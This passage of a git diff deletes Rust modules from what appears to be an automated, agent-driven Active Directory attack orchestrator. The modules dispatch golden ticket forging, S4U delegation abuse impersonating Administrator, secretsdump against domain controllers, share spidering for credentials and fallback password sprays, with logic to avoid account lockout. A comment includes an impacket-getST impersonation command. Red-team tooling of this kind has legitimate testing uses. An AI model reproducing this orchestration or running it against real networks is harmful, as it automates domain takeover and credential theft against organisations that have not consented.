.await - { - warn!(err = %e, "Failed to set golden ticket flag after dispatch"); - } - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch golden ticket"), - } - } -} - -/// Resolve domain SID and RID-500 account name by calling `impacket-lookupsid`. -/// Returns `(domain_sid, Option)`. Tries password credential first, -/// then NTLM hash. -/// -/// Uses the credential's own domain for NTLM auth (not the target domain) so -/// cross-domain trust authentication works — e.g. a `child.contoso.local` -/// cred can resolve the SID of `contoso.local` via its parent DC. 
-async fn resolve_domain_sid( - _domain: &str, - dc_ip: &str, - password_cred: Option<&ares_core::models::Credential>, - admin_hash: Option<&ares_core::models::Hash>, -) -> Option<(String, Option)> { - // Try password auth first — use the credential's native domain for auth - if let Some(cred) = password_cred { - let auth_domain = if cred.domain.is_empty() { - _domain - } else { - &cred.domain - }; - let args = json!({ - "domain": auth_domain, - "username": cred.username, - "password": cred.password, - "dc_ip": dc_ip, - }); - match ares_tools::privesc::get_sid(&args).await { - Ok(output) => { - let text = output.combined_raw(); - if let Some(sid) = ares_core::parsing::extract_domain_sid(&text) { - let admin_name = ares_core::parsing::extract_rid500_name(&text); - return Some((sid, admin_name)); - } - warn!(auth_domain = %auth_domain, user = %cred.username, "lookupsid succeeded but no SID pattern found in output"); - } - Err(e) => { - warn!(err = %e, user = %cred.username, auth_domain = %auth_domain, "lookupsid with password failed"); - } - } - } - - // Fall back to hash auth — use the hash's native domain for auth - if let Some(hash) = admin_hash { - let auth_domain = if hash.domain.is_empty() { - _domain - } else { - &hash.domain - }; - let args = json!({ - "domain": auth_domain, - "username": "Administrator", - "hash": hash.hash_value, - "dc_ip": dc_ip, - }); - match ares_tools::privesc::get_sid(&args).await { - Ok(output) => { - let text = output.combined_raw(); - if let Some(sid) = ares_core::parsing::extract_domain_sid(&text) { - let admin_name = ares_core::parsing::extract_rid500_name(&text); - return Some((sid, admin_name)); - } - warn!(auth_domain = %auth_domain, "lookupsid (hash) succeeded but no SID pattern found"); - } - Err(e) => { - warn!(err = %e, auth_domain = %auth_domain, "lookupsid with admin hash failed"); - } - } - } - - None -} diff --git a/ares-orchestrator/src/automation/mod.rs b/ares-orchestrator/src/automation/mod.rs deleted file mode 100644 index 3768130b..00000000 --- a/ares-orchestrator/src/automation/mod.rs +++ /dev/null @@ -1,64 +0,0 @@ -//! Background automation tasks. -//! -//! Each `auto_*` function is a long-running tokio task that periodically checks -//! the shared state and dispatches new tasks when conditions are met. All follow -//! the same pattern: -//! -//! 1. Sleep for an interval (configurable) -//! 2. Take a read lock, collect new work items -//! 3. Release lock, submit tasks via the dispatcher -//! 4. Mark items as processed (write lock + Redis persist) -//! -//! This mirrors the Python `_orchestrator.py` background tasks but eliminates -//! all threading hacks since tokio tasks are truly concurrent. - -mod acl; -mod adcs; -mod bloodhound; -mod coercion; -mod crack; -mod credential_access; -mod credential_expansion; -mod delegation; -mod gmsa; -mod golden_ticket; -mod mssql; -mod refresh; -mod s4u; -mod secretsdump; -mod share_enum; -mod shares; -mod stall_detection; -mod trust; -mod unconstrained; - -// Re-export all public task functions at the same paths they had before the split. 
-pub use acl::auto_acl_chain_follow; -pub use adcs::auto_adcs_enumeration; -pub use bloodhound::auto_bloodhound; -pub use coercion::auto_coercion; -pub use crack::auto_crack_dispatch; -pub use credential_access::auto_credential_access; -pub use credential_expansion::auto_credential_expansion; -pub use delegation::auto_delegation_enumeration; -pub use gmsa::auto_gmsa_extraction; -pub use golden_ticket::auto_golden_ticket; -pub use mssql::auto_mssql_detection; -pub use refresh::state_refresh; -pub use s4u::auto_s4u_exploitation; -pub use secretsdump::auto_local_admin_secretsdump; -pub use share_enum::auto_share_enumeration; -pub use shares::auto_share_spider; -pub use stall_detection::auto_stall_detection; -pub use trust::auto_trust_follow; -pub use unconstrained::auto_unconstrained_exploitation; - -pub(crate) fn crack_dedup_key(hash: &ares_core::models::Hash) -> String { - let prefix = &hash.hash_value[..32.min(hash.hash_value.len())]; - format!( - "{}:{}:{}", - hash.domain.to_lowercase(), - hash.username.to_lowercase(), - prefix - ) -} diff --git a/ares-orchestrator/src/automation/mssql.rs b/ares-orchestrator/src/automation/mssql.rs deleted file mode 100644 index 8477b6e4..00000000 --- a/ares-orchestrator/src/automation/mssql.rs +++ /dev/null @@ -1,94 +0,0 @@ -//! auto_mssql_detection -- detect MSSQL services on hosts. - -use std::sync::Arc; -use std::time::Duration; - -use serde_json::json; -use tokio::sync::watch; -use tracing::{info, warn}; - -use crate::dispatcher::Dispatcher; - -/// Scans hosts for MSSQL services (port 1433) and queues exploitation vulns. -/// Interval: 30s. Matches Python `_auto_mssql_detection`. -pub async fn auto_mssql_detection( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! 
{ - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - let work: Vec<(String, String)> = { - let state = dispatcher.state.read().await; - state - .hosts - .iter() - .filter(|h| { - h.services - .iter() - .any(|s| s.contains("1433") || s.to_lowercase().contains("mssql")) - }) - .filter(|h| !state.mssql_enum_dispatched.contains(&h.ip)) - .map(|h| (h.ip.clone(), h.hostname.clone())) - .collect() - }; - - for (ip, hostname) in work { - let vuln = ares_core::models::VulnerabilityInfo { - vuln_id: format!("mssql_{}", ip.replace('.', "_")), - vuln_type: "mssql_access".to_string(), - target: ip.clone(), - discovered_by: "auto_mssql_detection".to_string(), - discovered_at: chrono::Utc::now(), - details: { - let mut d = std::collections::HashMap::new(); - d.insert("target_ip".to_string(), json!(ip)); - if !hostname.is_empty() { - d.insert("hostname".to_string(), json!(hostname)); - // Extract domain from FQDN: "sql01.fabrikam.local" → "fabrikam.local" - if let Some(dot_pos) = hostname.find('.') { - let domain = &hostname[dot_pos + 1..]; - if !domain.is_empty() { - d.insert("domain".to_string(), json!(domain)); - } - } - } - d - }, - recommended_agent: "lateral".to_string(), - priority: 4, - }; - - match dispatcher - .state - .publish_vulnerability(&dispatcher.queue, vuln) - .await - { - Ok(true) => { - info!(ip = %ip, "MSSQL service detected — vulnerability queued"); - dispatcher - .state - .write() - .await - .mssql_enum_dispatched - .insert(ip.clone()); - let _ = dispatcher - .state - .persist_mssql_dispatched(&dispatcher.queue, &ip) - .await; - } - Ok(false) => {} // already exists - Err(e) => warn!(err = %e, "Failed to publish MSSQL vulnerability"), - } - } - } -} diff --git a/ares-orchestrator/src/automation/refresh.rs b/ares-orchestrator/src/automation/refresh.rs deleted file mode 100644 index 3c7363ad..00000000 --- a/ares-orchestrator/src/automation/refresh.rs +++ /dev/null @@ -1,32 +0,0 @@ -//! state_refresh -- periodic refresh of state from Redis. - -use std::sync::Arc; -use std::time::Duration; - -use tokio::sync::watch; -use tracing::warn; - -use crate::dispatcher::Dispatcher; - -/// Periodically refreshes state from Redis to pick up worker-published discoveries. -/// Interval: 10s. -pub async fn state_refresh(dispatcher: Arc, mut shutdown: watch::Receiver) { - let mut interval = tokio::time::interval(Duration::from_secs(10)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - // Skip first tick - interval.tick().await; - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - if let Err(e) = dispatcher.state.refresh_from_redis(&dispatcher.queue).await { - warn!(err = %e, "State refresh failed"); - } - } -} diff --git a/ares-orchestrator/src/automation/s4u.rs b/ares-orchestrator/src/automation/s4u.rs deleted file mode 100644 index 38f10451..00000000 --- a/ares-orchestrator/src/automation/s4u.rs +++ /dev/null @@ -1,354 +0,0 @@ -//! auto_s4u_exploitation -- exploit delegation vulnerabilities via S4U. -//! -//! When constrained or RBCD delegation vulnerabilities are discovered (via -//! `find_delegation` or BloodHound), this automation dispatches S4U attacks -//! using available credentials for the delegating account. -//! -//! NOTE: Unconstrained delegation is handled by `auto_unconstrained_exploitation` -//! which orchestrates the coerce → dump → secretsdump chain. 
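// Illustrative only, assuming the dispatched s4u_attack maps to impacket's
// getST S4U2Self + S4U2Proxy flow (names and password are placeholders):
//   impacket-getST 'child.contoso.local/websvc:Summer2024!' \
//       -spn cifs/dc01.child.contoso.local -impersonate Administrator
// The resulting .ccache then backs the follow-on operation.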
- -use std::collections::HashMap; -use std::sync::Arc; -use std::time::Duration; - -use serde_json::json; -use tokio::sync::watch; -use tokio::time::Instant; -use tracing::{debug, info, warn}; - -use crate::dispatcher::Dispatcher; - -/// Cooldown after a failed S4U attempt before retrying the same vuln. -/// Set to 5 minutes to wait for AD account lockout to expire. -const S4U_FAILURE_COOLDOWN: Duration = Duration::from_secs(300); - -/// Maximum consecutive failures before giving up on a vuln. -/// Set higher than the expected number of spray-induced lockouts -/// so that S4U can eventually succeed once sprays stop re-locking. -const S4U_MAX_FAILURES: u32 = 6; - -/// Kerberos/SMB errors that indicate an account is permanently disabled/revoked. -/// These should permanently block the vuln — no point retrying. -const PERMANENT_REVOCATION_PATTERNS: &[&str] = &["STATUS_ACCOUNT_DISABLED", "KDC_ERR_KEY_EXPIRED"]; - -/// Kerberos/SMB errors that indicate a temporary lockout. -/// These should count as failures but NOT permanently block — the lockout expires. -const LOCKOUT_PATTERNS: &[&str] = &["KDC_ERR_CLIENT_REVOKED", "STATUS_ACCOUNT_LOCKED_OUT"]; - -/// Monitors for delegation vulnerabilities and dispatches S4U attacks. -/// Interval: 20s. -pub async fn auto_s4u_exploitation( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let deleg_notify = dispatcher.delegation_notify.clone(); - let cred_notify = dispatcher.credential_access_notify.clone(); - let mut interval = tokio::time::interval(Duration::from_secs(20)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - // Track dispatch attempts per vuln to prevent infinite retry loops. - // Maps vuln_id -> (last_dispatch_time, failure_count) - let mut dispatch_tracker: HashMap = HashMap::new(); - - // Track task_id -> vuln_id so we can check completed task results for - // revocation errors and immediately stop retrying those vulns. - let mut task_vuln_map: HashMap = HashMap::new(); - - loop { - // Wake on: timer tick, new delegation vuln, OR new credential (so S4U fires - // immediately when a constrained delegation account's password is cracked). - tokio::select! { - _ = interval.tick() => {}, - _ = deleg_notify.notified() => {}, - _ = cred_notify.notified() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - // Check completed tasks for revocation/lockout errors. - // - Permanent revocation (disabled account) → block forever. - // - Temporary lockout → just count the failure, let cooldown handle retry. - { - let state = dispatcher.state.read().await; - let finished: Vec = task_vuln_map - .keys() - .filter(|tid| state.completed_tasks.contains_key(tid.as_str())) - .cloned() - .collect(); - for tid in finished { - if let Some(result) = state.completed_tasks.get(&tid) { - if has_permanent_revocation(result) { - if let Some(vid) = task_vuln_map.remove(&tid) { - warn!( - task_id = %tid, - vuln_id = %vid, - "S4U blocked: account permanently disabled — no further retries" - ); - dispatch_tracker.entry(vid).or_insert((Instant::now(), 0)).1 = - S4U_MAX_FAILURES; - } - } else if has_lockout_error(result) { - if let Some(vid) = task_vuln_map.remove(&tid) { - debug!( - task_id = %tid, - vuln_id = %vid, - "S4U lockout detected — will retry after cooldown" - ); - // Don't increment failure count beyond what dispatch already counted. - // The cooldown timer is already set from dispatch time. 
- } - } else { - // Success or non-revocation error — reset failure count so - // subsequent dispatches aren't permanently blocked by the - // S4U_MAX_FAILURES threshold. - if let Some(vid) = task_vuln_map.remove(&tid) { - if let Some(entry) = dispatch_tracker.get_mut(&vid) { - entry.1 = 0; - } - } - } - } - } - } - - let work: Vec = { - let state = dispatcher.state.read().await; - - // Skip if already domain admin - if state.has_domain_admin { - continue; - } - - state - .discovered_vulnerabilities - .values() - .filter_map(|vuln| { - let vtype = vuln.vuln_type.to_lowercase(); - if vtype != "constrained_delegation" && vtype != "rbcd" { - return None; - } - - // Already exploited? - if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { - return None; - } - - // Check dispatch cooldown — skip if recently dispatched and failed - if let Some((last_time, failures)) = dispatch_tracker.get(&vuln.vuln_id) { - if *failures >= S4U_MAX_FAILURES { - debug!( - vuln_id = %vuln.vuln_id, - failures = *failures, - "S4U skipped: max failures reached" - ); - return None; - } - if last_time.elapsed() < S4U_FAILURE_COOLDOWN { - return None; // Still in cooldown - } - } - - // Extract the delegating account name from details - let account_name = vuln - .details - .get("account_name") - .and_then(|v| v.as_str()) - .or_else(|| vuln.details.get("AccountName").and_then(|v| v.as_str())) - .map(|s| s.to_string()); - - let target_spn = vuln - .details - .get("delegation_target") - .and_then(|v| v.as_str()) - .or_else(|| { - vuln.details - .get("AllowedToDelegate") - .and_then(|v| v.as_str()) - }) - .map(|s| s.to_string()); - - // Find a credential or hash for the delegating account - let credential = account_name.as_ref().and_then(|acct| { - state - .credentials - .iter() - .find(|c| c.username.to_lowercase() == acct.to_lowercase()) - .cloned() - }); - - let hash = account_name.as_ref().and_then(|acct| { - state - .hashes - .iter() - .find(|h| { - h.username.to_lowercase() == acct.to_lowercase() - && h.hash_type.to_uppercase() == "NTLM" - }) - .cloned() - }); - - // Need at least a credential or hash to perform S4U - if credential.is_none() && hash.is_none() { - debug!( - vuln_id = %vuln.vuln_id, - vuln_type = %vuln.vuln_type, - account = ?account_name, - "S4U skipped: no credential or hash for delegating account" - ); - return None; - } - - // Resolve domain and DC IP - let domain = credential - .as_ref() - .map(|c| c.domain.clone()) - .or_else(|| hash.as_ref().map(|h| h.domain.clone())) - .unwrap_or_default(); - - let dc_ip = state - .domain_controllers - .get(&domain.to_lowercase()) - .cloned(); - - Some(S4uWork { - vuln: vuln.clone(), - credential, - hash, - target_spn, - domain, - dc_ip, - }) - }) - .collect() - }; - - for item in work { - let mut payload = json!({ - "technique": "s4u_attack", - "vuln_type": item.vuln.vuln_type, - "target": item.vuln.target, - "domain": item.domain, - "impersonate": "Administrator", - }); - - if let Some(ref spn) = item.target_spn { - payload["target_spn"] = json!(spn); - } - if let Some(ref dc) = item.dc_ip { - payload["target_ip"] = json!(dc); - } - - // Attach credential or hash — provide both flat fields (for prompt - // builders) and nested credential object (for structured extraction). 
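// For illustration only — the dual payload shape the block below produces
// when a plaintext credential is available, as a stand-alone snippet.
// The function name and all values are made up:
//
//     use serde_json::json;
//
//     fn example_s4u_payload() -> serde_json::Value {
//         json!({
//             "technique": "s4u_attack",
//             // flat fields, read by prompt builders
//             "username": "svc-web",
//             "password": "Spring2024!",
//             "account_name": "svc-web",
//             // nested object, read by structured extraction
//             "credential": {
//                 "username": "svc-web",
//                 "password": "Spring2024!",
//                 "domain": "contoso.local",
//             },
//         })
//     }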
- if let Some(ref cred) = item.credential { - payload["username"] = json!(cred.username); - payload["password"] = json!(cred.password); - payload["account_name"] = json!(cred.username); - payload["credential"] = json!({ - "username": cred.username, - "password": cred.password, - "domain": cred.domain, - }); - } else if let Some(ref hash) = item.hash { - payload["hash"] = json!(hash.hash_value); - payload["username"] = json!(hash.username); - if let Some(ref aes) = hash.aes_key { - payload["aes_key"] = json!(aes); - } - } - - let vuln_id = item.vuln.vuln_id.clone(); - // Attach vuln_id so result processing can mark_exploited on success - payload["vuln_id"] = json!(&vuln_id); - - // Priority 10 = highest — S4U must run before other agents use the - // credential and potentially lock out the account. - match dispatcher - .throttled_submit("exploit", "privesc", payload, 10) - .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - vuln_id = %vuln_id, - vuln_type = %item.vuln.vuln_type, - "S4U exploitation dispatched" - ); - // Record dispatch — increment failure count (reset on next success). - // The cooldown prevents rapid re-dispatch if it fails. - let entry = dispatch_tracker - .entry(vuln_id.clone()) - .or_insert((Instant::now(), 0)); - entry.0 = Instant::now(); - entry.1 += 1; - // Track task → vuln so we can check for revocation on completion. - task_vuln_map.insert(task_id, vuln_id); - } - Ok(None) => { - debug!(vuln_id = %vuln_id, "S4U task deferred by throttler"); - } - Err(e) => { - warn!(err = %e, vuln_id = %vuln_id, "Failed to dispatch S4U exploit") - } - } - } - } -} - -struct S4uWork { - vuln: ares_core::models::VulnerabilityInfo, - credential: Option, - hash: Option, - target_spn: Option, - domain: String, - dc_ip: Option, -} - -/// Check whether a task result matches any of the given error patterns. -fn result_matches_patterns(result: &ares_core::models::TaskResult, patterns: &[&str]) -> bool { - let payload = match &result.result { - Some(v) => v, - None => return false, - }; - - // Check error field - if let Some(err) = &result.error { - if patterns.iter().any(|p| err.contains(p)) { - return true; - } - } - - // Check raw tool outputs (array of strings embedded in the result payload) - if let Some(outputs) = payload.get("tool_outputs").and_then(|v| v.as_array()) { - for output in outputs { - if let Some(text) = output.as_str() { - if patterns.iter().any(|p| text.contains(p)) { - return true; - } - } - } - } - - // Check summary/result text - for key in &["summary", "output", "tool_output"] { - if let Some(text) = payload.get(*key).and_then(|v| v.as_str()) { - if patterns.iter().any(|p| text.contains(p)) { - return true; - } - } - } - - false -} - -/// Account is permanently disabled — no point retrying. -fn has_permanent_revocation(result: &ares_core::models::TaskResult) -> bool { - result_matches_patterns(result, PERMANENT_REVOCATION_PATTERNS) -} - -/// Account is temporarily locked out — will unlock after AD lockout duration. -fn has_lockout_error(result: &ares_core::models::TaskResult) -> bool { - result_matches_patterns(result, LOCKOUT_PATTERNS) -} diff --git a/ares-orchestrator/src/automation/secretsdump.rs b/ares-orchestrator/src/automation/secretsdump.rs deleted file mode 100644 index eb89a298..00000000 --- a/ares-orchestrator/src/automation/secretsdump.rs +++ /dev/null @@ -1,98 +0,0 @@ -//! auto_local_admin_secretsdump -- secretsdump with admin creds. 
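// A small sketch of the forest-scope rule this module applies below when
// pairing credentials with DCs (same domain, child domain, or parent
// domain); `in_scope` is an illustrative name, not part of the deleted code.
fn in_scope(dc_domain: &str, cred_domain: &str) -> bool {
    let d = dc_domain.to_lowercase();
    let c = cred_domain.to_lowercase();
    d == c || d.ends_with(&format!(".{c}")) || c.ends_with(&format!(".{d}"))
}

// in_scope("child.contoso.local", "contoso.local") -> true  (child-domain DC)
// in_scope("fabrikam.local", "contoso.local")      -> false (cross-forest)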
- -use std::sync::Arc; -use std::time::Duration; - -use tokio::sync::watch; -use tracing::{info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Dispatches secretsdump when admin credentials are detected. -/// Interval: 30s. Matches Python `_auto_local_admin_secretsdump`. -pub async fn auto_local_admin_secretsdump( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - // Collect credentials with passwords + target DCs. - // Do NOT gate on is_admin — the credential may have admin rights we - // haven't confirmed yet. Secretsdump will fail fast if it lacks - // privileges, but when it succeeds it's the fastest path to krbtgt. - // IMPORTANT: only target DCs in the credential's domain (or child - // domains). Cross-domain secretsdump attempts generate failed auths - // that trigger AD account lockout. - let work: Vec<(String, String, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - let creds: Vec<_> = state - .credentials - .iter() - .filter(|c| !c.domain.is_empty() && !c.password.is_empty()) - // Skip delegation accounts — secretsdump will always fail - // (non-admin) and wastes auth budget reserved for S4U. - .filter(|c| c.is_admin || !state.is_delegation_account(&c.username)) - .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) - .cloned() - .collect(); - - let mut items = Vec::new(); - for cred in &creds { - let cred_domain = cred.domain.to_lowercase(); - for (dc_domain, dc_ip) in state.domain_controllers.iter() { - let d = dc_domain.to_lowercase(); - // Same domain, child domain, or parent domain - if d == cred_domain - || d.ends_with(&format!(".{cred_domain}")) - || cred_domain.ends_with(&format!(".{d}")) - { - let dedup = format!( - "{}:{}:{}", - dc_ip, - cred.domain.to_lowercase(), - cred.username.to_lowercase() - ); - if !state.is_processed(DEDUP_SECRETSDUMP, &dedup) { - items.push((dedup, dc_ip.clone(), cred.clone())); - } - } - } - } - items - }; - - for (dedup_key, dc_ip, cred) in work.into_iter().take(3) { - let priority = if cred.is_admin { 2 } else { 5 }; - match dispatcher - .request_secretsdump(&dc_ip, &cred, priority) - .await - { - Ok(Some(task_id)) => { - info!(task_id = %task_id, dc = %dc_ip, user = %cred.username, "Admin secretsdump dispatched"); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_SECRETSDUMP, dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_SECRETSDUMP, &dedup_key) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch secretsdump"), - } - } - } -} diff --git a/ares-orchestrator/src/automation/share_enum.rs b/ares-orchestrator/src/automation/share_enum.rs deleted file mode 100644 index bf4ba60e..00000000 --- a/ares-orchestrator/src/automation/share_enum.rs +++ /dev/null @@ -1,106 +0,0 @@ -//! auto_share_enumeration -- enumerate SMB shares on discovered hosts using credentials. - -use std::sync::Arc; -use std::time::Duration; - -use tokio::sync::watch; -use tracing::{info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Dispatches share enumeration on each known host when credentials are available. -/// Interval: 20s. Dedup key: "{host_ip}:{cred_user}:{cred_domain}". 
-pub async fn auto_share_enumeration( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let mut interval = tokio::time::interval(Duration::from_secs(20)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - let mut no_cred_logged = false; - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - let work: Vec<(String, String, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - // Use first non-delegation credential to avoid burning auth budget - // on accounts reserved for S4U exploitation. - let cred = match state - .credentials - .iter() - .find(|c| { - !state.is_delegation_account(&c.username) - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - .or_else(|| state.credentials.first()) - { - Some(c) => { - no_cred_logged = false; - c.clone() - } - None => { - if !no_cred_logged { - info!( - hosts = state.hosts.len(), - target_ips = state.target_ips.len(), - "Share enum: no credentials in memory yet, waiting" - ); - no_cred_logged = true; - } - continue; - } - }; - - // Enumerate shares on every known host (target IPs + discovered hosts) - let mut ips: Vec = state.target_ips.clone(); - for host in &state.hosts { - if !ips.contains(&host.ip) { - ips.push(host.ip.clone()); - } - } - - ips.into_iter() - .filter_map(|ip| { - let dedup = format!( - "{}:{}:{}", - ip, - cred.username.to_lowercase(), - cred.domain.to_lowercase() - ); - if state.is_processed(DEDUP_SHARE_ENUM, &dedup) { - None - } else { - Some((dedup, ip, cred.clone())) - } - }) - .take(5) - .collect() - }; - - for (dedup_key, host_ip, cred) in work { - match dispatcher.request_share_enumeration(&host_ip, &cred).await { - Ok(Some(task_id)) => { - info!(task_id = %task_id, host = %host_ip, "Share enumeration dispatched"); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_SHARE_ENUM, dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_SHARE_ENUM, &dedup_key) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch share enumeration"), - } - } - } -} diff --git a/ares-orchestrator/src/automation/shares.rs b/ares-orchestrator/src/automation/shares.rs deleted file mode 100644 index 8aa45798..00000000 --- a/ares-orchestrator/src/automation/shares.rs +++ /dev/null @@ -1,82 +0,0 @@ -//! auto_share_spider -- spider readable shares for credentials. - -use std::sync::Arc; -use std::time::Duration; - -use tokio::sync::watch; -use tracing::{debug, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Spiders readable shares for credentials using available creds. -/// Interval: 30s. Matches Python `_auto_share_spider`. -pub async fn auto_share_spider(dispatcher: Arc, mut shutdown: watch::Receiver) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - let work: Vec<(String, String, String, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - // Use first non-delegation credential to avoid burning auth budget - // on accounts reserved for S4U exploitation. 
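// The selection rule stated above, as a stand-alone sketch — prefer a
// credential that is neither a delegation account nor quarantined, else
// fall back to any credential. `Cred` and the predicate parameters are
// illustrative stand-ins, not the ares_core types.
#[derive(Clone)]
struct Cred {
    username: String,
    domain: String,
}

fn pick_credential<'a>(
    creds: &'a [Cred],
    is_delegation: impl Fn(&str) -> bool,
    is_quarantined: impl Fn(&str, &str) -> bool,
) -> Option<&'a Cred> {
    creds
        .iter()
        .find(|c| !is_delegation(&c.username) && !is_quarantined(&c.username, &c.domain))
        .or_else(|| creds.first())
}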
-            let cred = match state
-                .credentials
-                .iter()
-                .find(|c| {
-                    !state.is_delegation_account(&c.username)
-                        && !state.is_credential_quarantined(&c.username, &c.domain)
-                })
-                .or_else(|| state.credentials.first())
-            {
-                Some(c) => c.clone(),
-                None => continue,
-            };
-
-            state
-                .shares
-                .iter()
-                .filter(|s| {
-                    let perms = s.permissions.to_uppercase();
-                    perms.contains("READ") && !s.name.to_uppercase().ends_with('$')
-                })
-                .filter_map(|s| {
-                    let dedup = format!("{}:{}:{}:{}", s.host, s.name, cred.username, cred.domain);
-                    if state.is_processed(DEDUP_SPIDERED_SHARES, &dedup) {
-                        None
-                    } else {
-                        Some((dedup, s.host.clone(), s.name.clone(), cred.clone()))
-                    }
-                })
-                .take(3) // limit batch size
-                .collect()
-        };
-
-        for (dedup_key, host, share, cred) in work {
-            match dispatcher.request_share_spider(&host, &share, &cred).await {
-                Ok(Some(task_id)) => {
-                    debug!(task_id = %task_id, host = %host, share = %share, "Share spider dispatched");
-                    dispatcher
-                        .state
-                        .write()
-                        .await
-                        .mark_processed(DEDUP_SPIDERED_SHARES, dedup_key.clone());
-                    let _ = dispatcher
-                        .state
-                        .persist_dedup(&dispatcher.queue, DEDUP_SPIDERED_SHARES, &dedup_key)
-                        .await;
-                }
-                Ok(None) => {}
-                Err(e) => warn!(err = %e, "Failed to dispatch share spider"),
-            }
-        }
-    }
-}
diff --git a/ares-orchestrator/src/automation/stall_detection.rs b/ares-orchestrator/src/automation/stall_detection.rs
deleted file mode 100644
index 269199f6..00000000
--- a/ares-orchestrator/src/automation/stall_detection.rs
+++ /dev/null
@@ -1,248 +0,0 @@
-//! auto_stall_detection -- detect when the operation is stuck and take action.
-//!
-//! When no new credentials or hashes have been discovered for a fixed
-//! period (3 minutes, see `STALL_THRESHOLD`), this automation triggers
-//! fallback actions:
-//!
-//! 1. Re-attempt password spray with discovered users
-//! 2. Re-run low-hanging-fruit checks (SYSVOL/GPP, LDAP descriptions, LAPS)
-//!    with all known creds
-//!
-//! This prevents the operation from idling when all easy wins are exhausted.
-
-use std::sync::Arc;
-use std::time::{Duration, Instant};
-
-use serde_json::json;
-use tokio::sync::watch;
-use tracing::{info, warn};
-
-use crate::dispatcher::Dispatcher;
-use crate::state::*;
-
-/// How long without new discoveries before we consider the op stalled.
-const STALL_THRESHOLD: Duration = Duration::from_secs(180); // 3 minutes
-
-/// Minimum interval between stall recovery actions.
-const RECOVERY_COOLDOWN: Duration = Duration::from_secs(120); // 2 minutes
-
-/// Monitors for discovery stalls and triggers fallback actions.
-/// Interval: 60s.
-pub async fn auto_stall_detection(
-    dispatcher: Arc<Dispatcher>,
-    mut shutdown: watch::Receiver<bool>,
-) {
-    let mut interval = tokio::time::interval(Duration::from_secs(60));
-    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
-
-    let start = Instant::now();
-    let mut last_cred_count = 0usize;
-    let mut last_hash_count = 0usize;
-    let mut last_change = Instant::now();
-    let mut last_recovery = Instant::now() - RECOVERY_COOLDOWN; // allow immediate first recovery
-    let mut recovery_attempts = 0u32;
-
-    loop {
-        tokio::select!
{ - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - // Don't check stall in the first 3 minutes (let initial recon complete) - if start.elapsed() < Duration::from_secs(180) { - continue; - } - - let (cred_count, hash_count, has_da, has_creds, has_users, has_dcs) = { - let state = dispatcher.state.read().await; - ( - state.credentials.len(), - state.hashes.len(), - state.has_domain_admin, - !state.credentials.is_empty(), - !state.users.is_empty(), - !state.domain_controllers.is_empty(), - ) - }; - - // Skip if we've achieved domain admin - if has_da { - continue; - } - - // Check if there has been progress - if cred_count > last_cred_count || hash_count > last_hash_count { - last_cred_count = cred_count; - last_hash_count = hash_count; - last_change = Instant::now(); - recovery_attempts = 0; // Reset on progress - continue; - } - - // Not stalled yet - if last_change.elapsed() < STALL_THRESHOLD { - continue; - } - - // Cooldown between recovery actions - if last_recovery.elapsed() < RECOVERY_COOLDOWN { - continue; - } - - // Cap recovery attempts (don't spam indefinitely) - if recovery_attempts >= 10 { - continue; - } - - info!( - stall_duration_secs = last_change.elapsed().as_secs(), - cred_count, - hash_count, - recovery_attempt = recovery_attempts + 1, - "Operation stall detected — triggering fallback actions" - ); - - last_recovery = Instant::now(); - recovery_attempts += 1; - - // --- Fallback 1: Password spray with discovered users --- - // Skip domains with pending delegation vulns — sprays lock delegation - // accounts and prevent S4U exploitation from succeeding. - if has_users && has_dcs { - let spray_work: Vec<(String, String)> = { - let state = dispatcher.state.read().await; - // Collect domains that have pending delegation vulns - let delegation_domains: std::collections::HashSet = state - .discovered_vulnerabilities - .values() - .filter(|v| { - let vt = v.vuln_type.to_lowercase(); - (vt == "constrained_delegation" || vt == "rbcd") - && !state.exploited_vulnerabilities.contains(&v.vuln_id) - }) - .filter_map(|v| { - v.details - .get("domain") - .or_else(|| v.details.get("Domain")) - .and_then(|d| d.as_str()) - .map(|d| d.to_lowercase()) - 